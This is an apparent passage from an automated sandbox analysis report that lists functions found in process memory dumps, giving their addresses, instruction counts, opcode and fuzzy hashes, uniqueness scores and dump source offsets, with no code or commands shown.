Opcode ID: ca3eb251169eb388c1987c1a8b96344ff009147aa3d51bebc19ba00de1cd9311
Instruction ID: 173d65e33503e2fdd8f0d748f4040f9df92dbd305e957461ee0308f6c1c9576b
Opcode Fuzzy Hash: ca3eb251169eb388c1987c1a8b96344ff009147aa3d51bebc19ba00de1cd9311
Instruction Fuzzy Hash: 9B512471E00219DBCF04DFA9D4845DDBBB6EF88300F25812AE518BB254E730A962CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0A98E514, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c7379d46f510cae02535103c5ba6cf12ff1fd5895d3f056e62c43b3eaf0493
Instruction ID: 626efff41b4fb3e0fd54d77c13668a3a71b696c6b7ed98da09bdb3266f87ae9e
Opcode Fuzzy Hash: 70c7379d46f510cae02535103c5ba6cf12ff1fd5895d3f056e62c43b3eaf0493
Instruction Fuzzy Hash: ED41A2F1F1453AAFDB22BF65C8686AABBB5AB84340F510825E412F7295F734D9108F80

Uniqueness

Uniqueness Score: -1.00%

Function 0A986538, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce478c5be29ea182d5b900bbda27b47f6ee2cc621f3be9be861c6eaf7d012a85
Instruction ID: efd9f640394b934a4e82c9ceddec08d58afba3e3e05c06a301d68dc2435d8851
Opcode Fuzzy Hash: ce478c5be29ea182d5b900bbda27b47f6ee2cc621f3be9be861c6eaf7d012a85
Instruction Fuzzy Hash: 2E51AAB5E052589FCB11CFA8D484ADEFBF1BF09314F24806AE918BB211D335AA46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0A98D930, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2f1350b2dd95eea5f1a0822a7a4599de03bd4b1224243ad01236375979cc5c
Instruction ID: 93592fd94c5388ae0df9277d089b0adc1f0272aa390a6314ad8212b06f3ebc49
Opcode Fuzzy Hash: 9f2f1350b2dd95eea5f1a0822a7a4599de03bd4b1224243ad01236375979cc5c
Instruction Fuzzy Hash: 6D419A71B102089FDB04EFA8D890AACBBF2EF89310F258169E501FB3A1DB31D841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0A983C48, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc311ed05108dde65a594c35fefede89b1a50da3cfd2870674a373f2e7fc128e
Instruction ID: 54b6ed6e44e513cfce078b4c92f4caa6d2b2d81b7ba5e6d23aa419dfee5698f8
Opcode Fuzzy Hash: bc311ed05108dde65a594c35fefede89b1a50da3cfd2870674a373f2e7fc128e
Instruction Fuzzy Hash: C05116B4A01209EFDB44EF94D594B9EBBF2AF88710F218459E905AB395CB31AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0A985B42, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe0825f6bc992bec49b5a97b3f57479e2a570126fc40c941b665fe22ab68d58
Instruction ID: a352aedafcaff389930adeff20bc7498a32b783431c78ec35a38b462d733bb5b
Opcode Fuzzy Hash: cbe0825f6bc992bec49b5a97b3f57479e2a570126fc40c941b665fe22ab68d58
Instruction Fuzzy Hash: 8E51EA75B002088FC744EF68C498EA9BBF5BF49324F1A50A9E805AB361DB31A845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0A98C7BC, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a3997356c32f1a205b94762606959d36283f0f3602c459953870abb01cf641
Instruction ID: 41ba4a7915e54025e0283717d7740a36d4c04bf4dc90ed9c8cc001c27bac5af4
Opcode Fuzzy Hash: b1a3997356c32f1a205b94762606959d36283f0f3602c459953870abb01cf641
Instruction Fuzzy Hash: DA417D70B112089FDB04EFA9C890AADBBF6EF89300F158569E501FB3A1DB35D840CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0A986570, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172baafb4c69d5347206194629e6b3819babdd69ceaf804788f49916f7d7548a
Instruction ID: 9b3fbee8e167f04cf426673baf9ad627f4b2d35583862f9dc39ead4f749ee7fa
Opcode Fuzzy Hash: 172baafb4c69d5347206194629e6b3819babdd69ceaf804788f49916f7d7548a
Instruction Fuzzy Hash: 8A4167B9D012589FCF10CFA9D584ADEFBF5BB09314F24942AE918BB210D374A946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0A9816F8, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aceb6c4e38139c0e8ef983e6ff285394dffa0fa54af3ed8a47aa03aa2c5d0a8
Instruction ID: 5222418f6d8fb16903872db9742e21e5a19f5978dbf4f20affd5b91eeae85f76
Opcode Fuzzy Hash: 7aceb6c4e38139c0e8ef983e6ff285394dffa0fa54af3ed8a47aa03aa2c5d0a8
Instruction Fuzzy Hash: 0D41CF70B042049FCB54EF78C454AAEB7F2AF89304B25896CE506EB391CB35DC46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0A9859C4, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383ed60468887efa70590ca0a9b29fa4a60d15ee79d6950ebecf923d1c877ada
Instruction ID: dd3a9465a9d73b30bd49377d6362d50071cd93211643878b79d719aca87d122e
Opcode Fuzzy Hash: 383ed60468887efa70590ca0a9b29fa4a60d15ee79d6950ebecf923d1c877ada
Instruction Fuzzy Hash: 104154B4E012589FCF10CFA9D588A9EFBF5BB09314F24842AE919BB210D374A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0A98EEAF, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8cdb93f04180d54804cddaf63e66a417283aea5c33361c5a7a614534c3c1c1c
Instruction ID: 45e569bae6b2e7027dd57def18e25d4a655958047f77ab9f04da2b87700e1b54
Opcode Fuzzy Hash: e8cdb93f04180d54804cddaf63e66a417283aea5c33361c5a7a614534c3c1c1c
Instruction Fuzzy Hash: C731B3F1F1413AAFCB22BF65C8686AABBB1AB84340F510819E412A7295F734C9108F80

Uniqueness

Uniqueness Score: -1.00%

Function 0A982C11, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd729a087c6ff2a89e5f4c8573bba10248db2fa94a49b2798526ee8b86cc3d7
Instruction ID: 0f0e82ee00a26677d3aa929a2befecd8554de9c9ab5a01535613aede1d53c02c
Opcode Fuzzy Hash: dbd729a087c6ff2a89e5f4c8573bba10248db2fa94a49b2798526ee8b86cc3d7
Instruction Fuzzy Hash: 55417275A00219CFCF10DFA4C880AE9F7B5FF49310F15869AD959AB251EB70AE84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0A98DD20, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0730cc109229e873587ee6d642e582240ce0d087a2b2e56b530366d0af29619e
Instruction ID: d6769ae98db6d65c241c6824a84728fa783409c2cae90a8e2fe4f290b9a938c0
Opcode Fuzzy Hash: 0730cc109229e873587ee6d642e582240ce0d087a2b2e56b530366d0af29619e
Instruction Fuzzy Hash: 424145B1E05218DFDB21AFA5D9849ADFFB2FF84300F214158D505BB25ADB3188A1CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0A98B66D, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd488586d23d1183a07c995609a4dcc76c4311445b15f68c45b27ad53345ecc8
Instruction ID: b525ff7147c193eb4f0c6267899a786a69517ab681ce19572a91455a392c741e
Opcode Fuzzy Hash: bd488586d23d1183a07c995609a4dcc76c4311445b15f68c45b27ad53345ecc8
Instruction Fuzzy Hash: 49413B31A20608DFCB04EFA8D8449DCBBB1FF49301F14C529E915BB250EB30AA89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0A9887C8, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48272f2a81a3ded18d684346b050ceed537a0f669f0341108cfc6c97612b23a5
Instruction ID: 5de2fab09839a481f8869382f7697a057fd5741ee718a7e361355db48c772237
Opcode Fuzzy Hash: 48272f2a81a3ded18d684346b050ceed537a0f669f0341108cfc6c97612b23a5
Instruction Fuzzy Hash: AE21687A7202108FDB24DA24CD8157E7BFAEF84240B18816AD153D7790CA34ED42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0A9816E8, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde14b9a7786c2c1af9815d9c1aa0ef37f607f69479741090d040bc05141661e
Instruction ID: 07ed683f9eec08bc7d55780670084b8c7c811ff55361ec36b6fbfd886dcc9fb9
Opcode Fuzzy Hash: bde14b9a7786c2c1af9815d9c1aa0ef37f607f69479741090d040bc05141661e
Instruction Fuzzy Hash: E1318C75A012059BC754EF68D880A9EB7F6FF88700F258A2DE516AB350DB31EC46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0A987508, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb79692fe69fd9c13d28e09b4ca1f8854b03b9a65a14e1785ee387b9f5a1e50
Instruction ID: f633ebe7c88855d675879ee4b8a8a20b77660516d5b0c02a5ff86e8434405238
Opcode Fuzzy Hash: 6fb79692fe69fd9c13d28e09b4ca1f8854b03b9a65a14e1785ee387b9f5a1e50
Instruction Fuzzy Hash: D031BF757102048FDB18EF68C854BAE77E6FF88710F2544BAE106DB3A1DA75EC058B90

Uniqueness

Uniqueness Score: -1.00%

Function 0A982318, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af84735cc1eb6ec6232002ba5ab51b21d0094747c70297217bffd800c90b60e0
Instruction ID: 89a1ab59833c9be26697bec3c96417708f2d038bd9bfbbd7aa40fea46bf12631
Opcode Fuzzy Hash: af84735cc1eb6ec6232002ba5ab51b21d0094747c70297217bffd800c90b60e0
Instruction Fuzzy Hash: 0F311875A60219DFCB14EFA8D894DEDB7B5FF99700B0185A9E915AB361CB30A804CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0A984AF4, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e52f4a6655b831664fe6ec8fb0829457c80f48a33e7a4feba0f5be9b894aaf3
Instruction ID: fc457e082a3973a1f2d2a44677dda829436ecfe6561ba37f1a8a536d48487864
Opcode Fuzzy Hash: 8e52f4a6655b831664fe6ec8fb0829457c80f48a33e7a4feba0f5be9b894aaf3
Instruction Fuzzy Hash: B0216771A083499FCB26DF64D880BEEBFF9EF8A210F05459BE485C7211D7399900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0A98C7EC, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c89c2bf54e3b47f1b059ca16a56762e4105f18725c2318b00cfa4c7b2b531a
Instruction ID: 889fe2e71da86ca03345f154a08af944fea89b79c9e41dc8b716896e706e1f96
Opcode Fuzzy Hash: e9c89c2bf54e3b47f1b059ca16a56762e4105f18725c2318b00cfa4c7b2b531a
Instruction Fuzzy Hash: 46213AF1F10116EBCB217F68C4802AEBB71EF41300B51496AC426AB2C4FBB1D924CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0A9874F8, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47f9945e33868784f7c7e7eb93adf49d22183f42d4ce88fac8d37f345c4a8e1e
Instruction ID: b059ebe5fdffa08d5b290f485cfdff2bdf2e28d80f42a95068de3dc060514a22
Opcode Fuzzy Hash: 47f9945e33868784f7c7e7eb93adf49d22183f42d4ce88fac8d37f345c4a8e1e
Instruction Fuzzy Hash: D321B2797102048FDB14EB68C854BAE3BE6EF89700F2544BAE006EB362DA75DD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0A989C3A, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438abc9c7c9e636f4b34dbdb5ec99dca83d454a71f86c420491b1bb86fd1bca6
Instruction ID: 6a137d13e314149696a5e4b444b396886fb15f5b6f27243610ddf5711fde4c65
Opcode Fuzzy Hash: 438abc9c7c9e636f4b34dbdb5ec99dca83d454a71f86c420491b1bb86fd1bca6
Instruction Fuzzy Hash: 5E21FAB03063008BE338AB32C95087BB7EABFC114971209ADD9528B794EF31E801CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0A9887D8, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9209e7ef9506dac4c44a9122d810a5ef482c8a57ba021bbfa828101172eb66a8
Instruction ID: 952fa2dcb90186e32ec70efb977910d70f901608fc561770761b5479baea0f18
Opcode Fuzzy Hash: 9209e7ef9506dac4c44a9122d810a5ef482c8a57ba021bbfa828101172eb66a8
Instruction Fuzzy Hash: C62146767206008FDB28EA64C98157E77FBEFC4240B588029D113D77A0CA34FD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0A985AB8, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d045196ccea113dcd0c6ac6eddf0e26b51b186afaa17a55b5e23fab83a7c80
Instruction ID: f06d4a33d327896e302f5e3d817b94ee8fb09064de59458cb342154400d57a2b
Opcode Fuzzy Hash: 97d045196ccea113dcd0c6ac6eddf0e26b51b186afaa17a55b5e23fab83a7c80
Instruction Fuzzy Hash: 71218BF17080117BC712BBA0D4141A97FE1EB822447368CA6D545DF28AEB24CA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00BED4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.248881227.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b04fea55511b41fd67eb3cad9627d34c3c29fdbec82a8d5e26cf18d05db923b
Instruction ID: e71fbd3142cad2c87d13b88725bbc0c7c241db0ebddbb7090162a882441240db
Opcode Fuzzy Hash: 8b04fea55511b41fd67eb3cad9627d34c3c29fdbec82a8d5e26cf18d05db923b
Instruction Fuzzy Hash: 422128B1504280DFDB01DF54D9C0B2ABFE5FBA8328F2485A9D9054B256C376D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A98A32F, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4e9d783efb5d41085bc04dd5b337f438bd67a9eaed47d3473735812c2eefeb3
Instruction ID: 223fcb95061a9c2950e5c59b7bb493d625a3246e2246c9320d9940220deae34d
Opcode Fuzzy Hash: c4e9d783efb5d41085bc04dd5b337f438bd67a9eaed47d3473735812c2eefeb3
Instruction Fuzzy Hash: AB2127787205148FCB04EF68D4989AE7BF6EF88A4071641AAE616CB371DF71EC05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0A98499A, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e03fe78d7904a2cebb204d9da1305c8cd3ee7f89df35ef25057cd5586ed6d1
Instruction ID: 6dbac66dd5e38edc1b9b12d0659a093ac139eacddb4a0cc08968b3af94908978
Opcode Fuzzy Hash: 86e03fe78d7904a2cebb204d9da1305c8cd3ee7f89df35ef25057cd5586ed6d1
Instruction Fuzzy Hash: 8521A5747002059FCB14AB79C8586AE77E6EF89701F51086DE5029B3A1DF759C42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0A985974, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aceacdabd837c49b7fb2ad333c2c053f959030b78cb0197d92ef8f84d93c690a
Instruction ID: 6f77fbc05c4647f3a2033282bc6819d567ac7019e1aabdac68bf2bb1dcbe7a18
Opcode Fuzzy Hash: aceacdabd837c49b7fb2ad333c2c053f959030b78cb0197d92ef8f84d93c690a
Instruction Fuzzy Hash: 02210471600215EBCB14EF29D4446AEB7F2FF84315F10C42DD9295B750EB36E951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.248899997.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2727fdaf48e8b2aa6214113b93f9c4929d45b7c7699e5cbcf0b843621d3f513
Instruction ID: 9ad1594b8b45aa3e00be76d8323eec7f33422beb9354821212af7ba07bc0da6b
Opcode Fuzzy Hash: b2727fdaf48e8b2aa6214113b93f9c4929d45b7c7699e5cbcf0b843621d3f513
Instruction Fuzzy Hash: A2212571504248DFCB14DF20D5D0B36BBA2FB84314F24C5A9DA094B246CB37D85BCA61

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.248899997.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7f5c02dbc0fc3fe45870e163e9edb80b79ed0c018a7addc88033972568a109
Instruction ID: 948e80df3d459717922ca88a89daa3d6722fdb6edb0de2ae225cb286225c49bf
Opcode Fuzzy Hash: 6f7f5c02dbc0fc3fe45870e163e9edb80b79ed0c018a7addc88033972568a109
Instruction Fuzzy Hash: 27210771504248DFDB01DF14D5C0B36BBA6FB84314F24C5EDDA094B246C336D85ACAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A980A50, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f28677bb2bd327a119e2841324c1cdefbc81f428f6b917726ce575b69d69ef67
Instruction ID: 0ab48977524aa2b892439d48d10f65611706aefb90ec78fd0ac0fdfe200711b6
Opcode Fuzzy Hash: f28677bb2bd327a119e2841324c1cdefbc81f428f6b917726ce575b69d69ef67
Instruction Fuzzy Hash: DE215371A106099FCB50EF6DD88099DFBB4FF49310B51C26AE958A7200FB30E999CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0A985AD8, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702d93bcdf40203ed9db047ef3ae646dbe875978d264d249860bd224b5a74fbd
Instruction ID: 9850b9139b35e81715166d8888fc005d53297f3feec08a1fb7d469ed59468f1f
Opcode Fuzzy Hash: 702d93bcdf40203ed9db047ef3ae646dbe875978d264d249860bd224b5a74fbd
Instruction Fuzzy Hash: 451181717041059FDB14BFA5C99476E76FAAF89200F220478D506E73A1DF71DC00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A98C7DC, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51f39b435bc4c08974d91915495a3fba27e5856456c83dc6abf660adeab88c9
Instruction ID: 8c87fd1c8158046699ad737c174a78ff7b4754abc00cadb70fc3593943d40935
Opcode Fuzzy Hash: e51f39b435bc4c08974d91915495a3fba27e5856456c83dc6abf660adeab88c9
Instruction Fuzzy Hash: DC11A3B2F0510AEBEB617A94D9445EE7FB4EB41351B210CA5D099F32C4E331CA318E94

Uniqueness

Uniqueness Score: -1.00%

Function 0A9827B8, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1eb9fd976e350ff40a6a9b2800f21f9dada333807bb303afd5b83e340aa6779
Instruction ID: c05f4c155cc91cde85539178c7c1470b8153eef2e49999d5352bc4584e55186c
Opcode Fuzzy Hash: a1eb9fd976e350ff40a6a9b2800f21f9dada333807bb303afd5b83e340aa6779
Instruction Fuzzy Hash: 7A1106703053118FCF29EB21D810AAAB7AADFC2214B15857ED425CF262DF71D806CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.248899997.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c912e0275ad8993251fa0bb0dcfd07b7b166f329d2d51f333ae8652ea0537b3b
Instruction ID: df76ee17b44e8274783d2ff2a4448d365553f8728f57ca2951bd727e8c3b704f
Opcode Fuzzy Hash: c912e0275ad8993251fa0bb0dcfd07b7b166f329d2d51f333ae8652ea0537b3b
Instruction Fuzzy Hash: 6321C6755093C48FCB02CF20D5A4B15BFB2EB45314F28C5EAD8498B657C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0A9849A8, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432d46e1d04798b0b3e5bc0e51bec79b9ab0f463b1730db27b9dbd7f0e3a1d28
Instruction ID: 5e3d7ded2bd4ded14b93603650f62d0c5440f210f9fe13a95b7f8899ea30d551
Opcode Fuzzy Hash: 432d46e1d04798b0b3e5bc0e51bec79b9ab0f463b1730db27b9dbd7f0e3a1d28
Instruction Fuzzy Hash: 61118F747003148FDB18AF69C8A8A6E77E6EFC9704F11086DE502AB3A1DF759C45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0A987DD5, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1119cfc19a9d570d3960bba3b37dd2f5c3227de7dca79eea62a4e2a023a7349c
Instruction ID: 26ac3fc26519476adc35ebd786906b30881a499c083c78bb021d97882f8eff07
Opcode Fuzzy Hash: 1119cfc19a9d570d3960bba3b37dd2f5c3227de7dca79eea62a4e2a023a7349c
Instruction Fuzzy Hash: 931142717011059FDB24AFA5C9947AE77FAAF89640F220479D506E73A2DF71CD00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0A98B298, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3517a3d08b8d9a1935abb693a0f7ec90a21c30c9e38439ba73d9291a95a146ce
Instruction ID: 3369b8dd28f5286f37dfd332f3d72ab10ab71a1bb2c0625e6d351bdd1af0aeec
Opcode Fuzzy Hash: 3517a3d08b8d9a1935abb693a0f7ec90a21c30c9e38439ba73d9291a95a146ce
Instruction Fuzzy Hash: 89114F75F016168FCB15EFA8C4501EEFBB1EF4931071986ABD959EB201EB30AA41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0A984258, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4cab56092418cec559837af9233087ccb2779c9823c2af1f4a6f1cb2231d0c
Instruction ID: 5347e2588920fe90db00f688163a8e5a541aff1f2f7bdf3d36c186516285dc11
Opcode Fuzzy Hash: 8e4cab56092418cec559837af9233087ccb2779c9823c2af1f4a6f1cb2231d0c
Instruction Fuzzy Hash: 7311C2B5B1431A9FCB11EF69C880AAE7BF8FF88610F00456AED24D7251DB34D911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A986327, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ef6230da34274369f0146f1908f8e0e1dfaae981c1342eea3b5dcfcdd88c47
Instruction ID: 2576ddd06e53c5b7c53df8100d05d515d322ffcd134746eb3134f9ce99321726
Opcode Fuzzy Hash: a0ef6230da34274369f0146f1908f8e0e1dfaae981c1342eea3b5dcfcdd88c47
Instruction Fuzzy Hash: 95119171E00249EFCF04EF64D4946EDBBB2EF85310F10456AE5126B361EF765946CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00BED49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.248881227.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64477db9f9483eff024ad21beefddb018fc80a7aa46d68ce26437d5177f2104
Instruction ID: bb82e89208e760d614b3f71b871b82573a57f99bc50755987590cbc55d3bf638
Opcode Fuzzy Hash: d64477db9f9483eff024ad21beefddb018fc80a7aa46d68ce26437d5177f2104
Instruction Fuzzy Hash: 3411B176804280CFCB12CF14D5C4B1ABFB1FB94324F28C6A9D8050B656C376D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0A988921, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
